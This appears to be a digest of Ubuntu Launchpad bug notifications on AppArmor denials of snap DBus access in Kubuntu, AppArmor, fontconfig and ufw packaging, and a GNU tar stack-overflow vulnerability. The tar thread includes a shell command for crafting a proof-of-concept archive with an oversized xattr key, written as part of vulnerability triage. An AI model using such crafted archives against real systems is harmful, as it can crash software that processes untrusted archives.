Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through. Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: No notification appears at all. Additional information: Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries: ``` = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access ``` Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault. This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422, however it seems as if Element is trying to hit the right paths and interfaces and is still being denied (based on looking at the info in https://github.com/snapcore/snapd/blob/master/interfaces/builtin/desktop_legacy.go and comparing the paths and interfaces there with the paths and interfaces shown by snappy-debug. I talked about this issue with Erich Eickmeyer and he mentioned that it occurred after a Plasma update. This doesn't make a great deal of sense to
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
Yes I hit that exact issue in Calamares but after fixing it I then hit another similar crash in a different script in calamares - will see if I can reproduce and provide you with details. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056696 Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors Status in snapd: New Status in apparmor package in Ubuntu: Confirmed Bug description: OS: Kubuntu Noble 24.04 Alpha (two-day old install) snapd version: 2.61.2 Affected Snaps: firefox, thunderbird, element-desktop Steps to reproduce: # For Firefox: 1. Open the Firefox Snap. 2. Open https://www.bennish.net/web-notifications.html. 3. Click "Authorize" and allow the website to send notifications. 4. Click "Show". Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback. # For Thunderbird: 1. Open the Thunderbird Snap. 2. Ensure you are connected to an email account. 3. Unfocus the Thunderbird window. 4. Wait for an email to come through. Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback. # For Element: 1. Open the Element Snap. Expected result: An apptray indicator should appear in the system tray with the Element logo. Actual result: No such indicator appears. 2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through. Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: No notification appears at all. Additional information: Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries: ``` = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access ``` Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault. This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422, however it seems as if Element is trying to hit the right paths and interfaces and is still being denied (based on looking at the info in https://github.com/snapcore/snapd/blob/master/interfaces/builtin/desktop_legacy.go and comparing the paths and interfaces there with the paths and interfaces shown by snappy-debug. I talked about this issue with Erich Eickmeyer and he mentioned that it occurred after a Plasma update. This doesn't make a great deal of sense to me, and I suspect possibly some other component of the affected systems happened to get updated at the same time (perhaps the snapd Snap), but it's
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
So I installed kubuntu-desktop on an up-to-date noble VM and then after logging into the kubuntu session I was able to reproduce the issue for Notifications but I couldn't see anything owning the /StatusNotifierItem dbus path. For notifications I submitted https://github.com/snapcore/snapd/pull/13737 to snapd which should resolve that but if anyone can help me reproduce the issue for the status notifier item that would be great. FWIW I have attached a screenshot of d-feet showing the various dbus paths owned by plasmashell and /StatusNotifierItem is not listed. Am I perhaps missing some other package that doesn't get pulled in by the standard kubuntu-desktop metapackage? ** Attachment added: "Pasted image.png" https://bugs.launchpad.net/snapd/+bug/2056696/+attachment/5757409/+files/Pasted%20image.png -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056696 Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors Status in snapd: New Status in apparmor package in Ubuntu: Confirmed Bug description: OS: Kubuntu Noble 24.04 Alpha (two-day old install) snapd version: 2.61.2 Affected Snaps: firefox, thunderbird, element-desktop Steps to reproduce: # For Firefox: 1. Open the Firefox Snap. 2. Open https://www.bennish.net/web-notifications.html. 3. Click "Authorize" and allow the website to send notifications. 4. Click "Show". Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback. # For Thunderbird: 1. Open the Thunderbird Snap. 2. Ensure you are connected to an email account. 3. Unfocus the Thunderbird window. 4. Wait for an email to come through. Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback. # For Element: 1. Open the Element Snap. Expected result: An apptray indicator should appear in the system tray with the Element logo. Actual result: No such indicator appears. 2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through. Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: No notification appears at all. Additional information: Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries: ``` = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell" DBus access ``` Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault. This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422,
[Touch-packages] [Bug 2058329] [NEW] Update apparmor to 4.0.0-beta3 in noble
Public bug reported: Latest upstream release https://gitlab.com/apparmor/apparmor/-/releases/v4.0.0-beta3 Contains only bug fixes since 4.0.0-beta2 which is currently in noble- proposed thus does not require a FFe. ** Affects: apparmor (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2058329 Title: Update apparmor to 4.0.0-beta3 in noble Status in apparmor package in Ubuntu: New Bug description: Latest upstream release https://gitlab.com/apparmor/apparmor/-/releases/v4.0.0-beta3 Contains only bug fixes since 4.0.0-beta2 which is currently in noble- proposed thus does not require a FFe. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2058329/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
> Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" This is provided by the system-observe interface in snapd - currently it looks like element-desktop does not plug this so the element-desktop snap needs to be updated to include this. > Log: apparmor="DENIED" operation="dbus_method_call" bus="session" > path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" > mask="send" name="org.kde.kwalletd5" pid=2950 > label="snap.element-desktop.element-desktop" peer_pid=1762 > peer_label="unconfined" > Log: apparmor="DENIED" operation="dbus_method_call" bus="session" > path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" > mask="send" name="org.kde.kwalletd5" pid=2950 > label="snap.element-desktop.element-desktop" peer_pid=1762 > peer_label="unconfined" These are provided by the password-manager-service interface in snapd - again currently it looks like element-desktop does not plug this so the element-desktop snap needs to be updated to include this as well. Finally, for the last two > Log: apparmor="DENIED" operation="dbus_method_call" bus="session" > path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" > member="GetAll" name=":1.45" mask="receive" pid=2950 > label="snap.element-desktop.element-desktop" peer_pid=2394 > peer_label="plasmashell" > Log: apparmor="DENIED" operation="dbus_signal" bus="session" > path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" > member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 > label="snap.element-desktop.element-desktop" peer_pid=2394 > peer_label="plasmashell" Yes this is due to the peer_label mismatch - previously plasmashell would run without an AppArmor profile and so was "unconfined" - the most recent apparmor release in Noble contains a new profile for plasmashell in /etc/apparmor.d/plasmashell with the label "plasmashell" - and so now the peer_label doesn't match. This likely needs to be fixed on the snapd side (or we figure out a way in apparmor to not ship this profile). -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056696 Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors Status in snapd: New Status in apparmor package in Ubuntu: Confirmed Bug description: OS: Kubuntu Noble 24.04 Alpha (two-day old install) snapd version: 2.61.2 Affected Snaps: firefox, thunderbird, element-desktop Steps to reproduce: # For Firefox: 1. Open the Firefox Snap. 2. Open https://www.bennish.net/web-notifications.html. 3. Click "Authorize" and allow the website to send notifications. 4. Click "Show". Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback. # For Thunderbird: 1. Open the Thunderbird Snap. 2. Ensure you are connected to an email account. 3. Unfocus the Thunderbird window. 4. Wait for an email to come through. Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback. # For Element: 1. Open the Element Snap. Expected result: An apptray indicator should appear in the system tray with the Element logo. Actual result: No such indicator appears. 2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through. Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays. Actual result: No notification appears at all. Additional information: Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries: ``` = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined" DBus access = AppArmor = Time: 2024-03-10T13:4 Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950
[Touch-packages] [Bug 2056496] Re: [FFe] AppArmor 4.0-beta2 + prompting support for noble
Uploaded to noble-proposed yesterday https://launchpad.net/ubuntu/+source/apparmor/4.0.0~beta2-0ubuntu3 ** Changed in: apparmor (Ubuntu) Status: Triaged => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056496 Title: [FFe] AppArmor 4.0-beta2 + prompting support for noble Status in apparmor package in Ubuntu: Fix Committed Bug description: AppArmor 4.0-beta2 contains fixes that prevented AppArmor 4.0-beta1 from landing pre feature freeze. Landing AppArmor 4.0-beta's will enable us to more easily track upstream bug fixes, and is needed to support network rules in prompting. The addition of the prompting patch on top of AppArmor 4.0 is required to support snapd prompting in general for both file and network rules. Currently the prompting patch is not part of the upstream release but is part of the vendored apparmor in snapd. In ordered for snapd to be able to vendor the noble release of apparmor it requires support for prompting. The prompting patch is a straight rebase to AppArmor 4.0 of the patch that has been in testing in snapd prompting for more than six months. Changes from 4.0.0~alpha4-0ubuntu1 (current noble) version Beta1 added three additional features that were not present in alpha4 (current Noble). • support for fine grained (address based) IPv4 and IPv6 mediation (required for prompting to support networking). • aa-notify support message filters to reduce notifications • aa-logprof/genprof support for mount rules None of these features affect existing policy, which will continue to function under the abi that it was developed under. This can be seen in the regression testing below. I addition to the 3 features introduced in Beta1, Beta1 and Beta2 add several bug fixes the most important are highlighted below with the full list available in the upstream release notes, available at https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_4.0-beta1 and https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_4.0-beta2 • new unconfined profiles in support of unprivileged user namespace mediation https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626 ∘ nautalus, devhelp, element-desktop, epiphany, evolution, keybase, opam • fix policy generation for non-af_inet rules (MR:1175) • Fix race when reading proc files (AABUG:355, MR:1157) • handle unprivileged_userns transition in userns tests (MR:1146) • fix usr-merge failures on exec and regex tests (MR:1146) This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d The output of a test run is in the attached qrt.output file. Of which the summary is below Ran 62 tests in 811.542s OK (skipped=3) apparmor_4.0.0~beta2-0ubuntu3 has been installed on several up to date (as of March 7) noble systems. Boot/Reboot and regression tests have been done, against different kernel versions. 6.8.0-11-generic #11-Ubuntu 6.5.0-14-generic #14-Ubuntu 6.7.0 (upstream custom build) 6.8-rc3 (upstream custom build) The changelog is available here https://launchpad.net/~apparmor-dev/+archive/ubuntu/apparmor-devel/+files/apparmor_4.0.0~beta2-0ubuntu3_source.changes The prepared package is available via the ppa https://launchpad.net/~apparmor-dev/+archive/ubuntu/apparmor-ffe To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2056496/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2054924] Re: color emoji are broken with fontconfig 2.15
As per https://gitlab.freedesktop.org/fontconfig/fontconfig/-/issues/409#note_2298588 this can also be fixed by adding an additional rule to /etc/fonts/conf.d/70-no-bitmaps.conf of the form: false ** Bug watch added: gitlab.freedesktop.org/fontconfig/fontconfig/-/issues #409 https://gitlab.freedesktop.org/fontconfig/fontconfig/-/issues/409 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to fontconfig in Ubuntu. https://bugs.launchpad.net/bugs/2054924 Title: color emoji are broken with fontconfig 2.15 Status in Fontconfig: Fix Released Status in fontconfig package in Ubuntu: Triaged Status in fonts-noto-color-emoji package in Ubuntu: Triaged Status in fontconfig package in Debian: Confirmed Bug description: The Noto Color Emoji font is no longer used to show emoji. Many emoji no longer show and the few that do are not in color. To manage notifications about this bug go to: https://bugs.launchpad.net/fontconfig/+bug/2054924/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2051540] Re: ufw ftbfs with Python 3.12 as default
Both deb8 tests already declares a Depends on python3-distutils - and we can see that the current test runs all used the 3.11 based python3-distutils - do we need a no-change-rebuild of python3-stdlib- extensions so that it builds against python 3.12? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ufw in Ubuntu. https://bugs.launchpad.net/bugs/2051540 Title: ufw ftbfs with Python 3.12 as default Status in ufw: Fix Committed Status in ufw package in Ubuntu: Confirmed Status in ufw package in Debian: Fix Released Bug description: == ERROR: test_ufwcommand_parse (tests.unit.test_parser.ParserTestCase.test_ufwcommand_parse) Test UFWCommand.parse() -- Traceback (most recent call last): File "/<>/tests/unit/test_parser.py", line 88, in test_ufwcommand_parse self.assertEquals('status', pr.action, "%s != 'status'" % (pr.action)) ^ AttributeError: 'ParserTestCase' object has no attribute 'assertEquals'. Did you mean: 'assertEqual'? == ERROR: test_ufwcommand_rule_get_command (tests.unit.test_parser.ParserTestCase.test_ufwcommand_rule_get_command) Test UFWCommand(Route)Rule.get_command() -- Traceback (most recent call last): File "/<>/tests/unit/test_parser.py", line 375, in test_ufwcommand_rule_get_command self.assertEquals(len(errors), 0, ^ AttributeError: 'ParserTestCase' object has no attribute 'assertEquals'. Did you mean: 'assertEqual'? -- Ran 24 tests in 7.584s FAILED (errors=9) test_skeleton test_example (tests.unit.test_skeleton.SkeletonTestCase.test_example) Test example dummy test ... ok -- Ran 1 test in 0.000s OK To manage notifications about this bug go to: https://bugs.launchpad.net/ufw/+bug/2051540/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2051540] Re: ufw ftbfs with Python 3.12 as default
** Also affects: ufw Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ufw in Ubuntu. https://bugs.launchpad.net/bugs/2051540 Title: ufw ftbfs with Python 3.12 as default Status in ufw: New Status in ufw package in Ubuntu: Confirmed Bug description: == ERROR: test_ufwcommand_parse (tests.unit.test_parser.ParserTestCase.test_ufwcommand_parse) Test UFWCommand.parse() -- Traceback (most recent call last): File "/<>/tests/unit/test_parser.py", line 88, in test_ufwcommand_parse self.assertEquals('status', pr.action, "%s != 'status'" % (pr.action)) ^ AttributeError: 'ParserTestCase' object has no attribute 'assertEquals'. Did you mean: 'assertEqual'? == ERROR: test_ufwcommand_rule_get_command (tests.unit.test_parser.ParserTestCase.test_ufwcommand_rule_get_command) Test UFWCommand(Route)Rule.get_command() -- Traceback (most recent call last): File "/<>/tests/unit/test_parser.py", line 375, in test_ufwcommand_rule_get_command self.assertEquals(len(errors), 0, ^ AttributeError: 'ParserTestCase' object has no attribute 'assertEquals'. Did you mean: 'assertEqual'? -- Ran 24 tests in 7.584s FAILED (errors=9) test_skeleton test_example (tests.unit.test_skeleton.SkeletonTestCase.test_example) Test example dummy test ... ok -- Ran 1 test in 0.000s OK To manage notifications about this bug go to: https://bugs.launchpad.net/ufw/+bug/2051540/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
Actually I just got it working - no need to send PoC @kerneldude - I made my own. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu. https://bugs.launchpad.net/bugs/2029464 Title: A stack overflow in GNU Tar Status in tar package in Ubuntu: New Bug description: A stack overflow vulnerability exists in GNU Tar up to including v1.34, as far as I can see, Ubuntu is using v1.3. The bug exists in the function xattr_decoder() in xheader.c, where alloca() is used and it may overflow the stack if a sufficiently long xattr key is used. The vulnerability can be triggered when extracting a tar/pax archive that contains such a long xattr key. Vulnerable code: https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723 PoC tar archive is attached in a zip archive to reduce the size. I reported the vulnerability yesterday to GNU Tar maintainers and they replied that the issue was fixed in the version that was released two weeks ago: "Sergey fixed that bug here: https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4 and the fix appears in tar 1.35, released July 18. " To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tar/+bug/2029464/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
So I managed to create a tar file with an extended attribute name of length of ~ 36 bytes long (the largest I can do without exceeding the existing check on maximum extended header lengths it seems) but this is not able to trigger the vuln - so if you are able to share your PoC that would be great. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu. https://bugs.launchpad.net/bugs/2029464 Title: A stack overflow in GNU Tar Status in tar package in Ubuntu: New Bug description: A stack overflow vulnerability exists in GNU Tar up to including v1.34, as far as I can see, Ubuntu is using v1.3. The bug exists in the function xattr_decoder() in xheader.c, where alloca() is used and it may overflow the stack if a sufficiently long xattr key is used. The vulnerability can be triggered when extracting a tar/pax archive that contains such a long xattr key. Vulnerable code: https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723 PoC tar archive is attached in a zip archive to reduce the size. I reported the vulnerability yesterday to GNU Tar maintainers and they replied that the issue was fixed in the version that was released two weeks ago: "Sergey fixed that bug here: https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4 and the fix appears in tar 1.35, released July 18. " To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tar/+bug/2029464/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
@kerneldude - any chance you could share your poc (perhaps email it to secur...@ubuntu.com rather than post it publicly here)? I have tried creating one via the following but I hit the CLI args limit before I can get an xattr key long enough: touch bar tar --pax-option SCHILY.xattr.user.$(python3 -c "print('a'*131048)"):=test -cf poc-crafted.tar bar -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu. https://bugs.launchpad.net/bugs/2029464 Title: A stack overflow in GNU Tar Status in tar package in Ubuntu: New Bug description: A stack overflow vulnerability exists in GNU Tar up to including v1.34, as far as I can see, Ubuntu is using v1.3. The bug exists in the function xattr_decoder() in xheader.c, where alloca() is used and it may overflow the stack if a sufficiently long xattr key is used. The vulnerability can be triggered when extracting a tar/pax archive that contains such a long xattr key. Vulnerable code: https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723 PoC tar archive is attached in a zip archive to reduce the size. I reported the vulnerability yesterday to GNU Tar maintainers and they replied that the issue was fixed in the version that was released two weeks ago: "Sergey fixed that bug here: https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4 and the fix appears in tar 1.35, released July 18. " To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tar/+bug/2029464/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
Excellent - thanks for letting us know. So since a CVE has already been assigned then we won't assign an additional one. I'll add the details to our CVE tracker. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu. https://bugs.launchpad.net/bugs/2029464 Title: A stack overflow in GNU Tar Status in tar package in Ubuntu: New Bug description: A stack overflow vulnerability exists in GNU Tar up to including v1.34, as far as I can see, Ubuntu is using v1.3. The bug exists in the function xattr_decoder() in xheader.c, where alloca() is used and it may overflow the stack if a sufficiently long xattr key is used. The vulnerability can be triggered when extracting a tar/pax archive that contains such a long xattr key. Vulnerable code: https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723 PoC tar archive is attached in a zip archive to reduce the size. I reported the vulnerability yesterday to GNU Tar maintainers and they replied that the issue was fixed in the version that was released two weeks ago: "Sergey fixed that bug here: https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4 and the fix appears in tar 1.35, released July 18. " To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tar/+bug/2029464/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2029464] Re: A stack overflow in GNU Tar
@kerneldude - do you know if MITRE ever assigned a CVE for this? ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu. https://bugs.launchpad.net/bugs/2029464 Title: A stack overflow in GNU Tar Status in tar package in Ubuntu: New Bug description: A stack overflow vulnerability exists in GNU Tar up to including v1.34, as far as I can see, Ubuntu is using v1.3. The bug exists in the function xattr_decoder() in xheader.c, where alloca() is used and it may overflow the stack if a sufficiently long xattr key is used. The vulnerability can be triggered when extracting a tar/pax archive that contains such a long xattr key. Vulnerable code: https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723 PoC tar archive is attached in a zip archive to reduce the size. I reported the vulnerability yesterday to GNU Tar maintainers and they replied that the issue was fixed in the version that was released two weeks ago: "Sergey fixed that bug here: https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4 and the fix appears in tar 1.35, released July 18. " To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tar/+bug/2029464/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2044625] Re: package libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 failed to install/upgrade: зацикливание триггеров, отмена работы
